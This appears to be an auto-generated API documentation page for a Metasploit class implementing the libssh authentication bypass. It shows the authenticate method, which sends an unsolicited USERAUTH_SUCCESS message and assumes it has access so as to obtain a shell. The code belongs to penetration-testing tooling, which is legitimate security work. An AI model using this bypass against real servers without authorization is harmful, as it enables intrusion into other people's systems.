Class: Net::SSH::Authentication::Methods::LibsshAuthBypass

Inherits:
Abstract
  • Object
show all
Defined in:
lib/msf/core/exploit/ssh/auth_methods.rb

Overview

Instance Method Summary collapse

Instance Method Details

#authenticate(service_name, username, password = nil) ⇒ Object


169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
# File 'lib/msf/core/exploit/ssh/auth_methods.rb', line 169

def authenticate(service_name, username, password = nil)
  debug { 'Sending SSH_MSG_USERAUTH_SUCCESS' }

  # USERAUTH_SUCCESS is OOB and elicits no reply
  send_message(Net::SSH::Buffer.from(
=begin
    byte      SSH_MSG_USERAUTH_SUCCESS
=end
    :byte, USERAUTH_SUCCESS
  ))

  # We can't fingerprint or otherwise reduce false positives using a session
  # channel open, since most implementations I've seen support only one
  # session channel and don't support channel closing, so this would block
  # us from getting a shell
  #
  # Secondly, libssh doesn't send a CHANNEL_OPEN_FAILURE when we're not
  # authed, so we have to wait for a timeout on CHANNEL_OPEN to return false

  # So assume we succeeded until we can verify
  true
end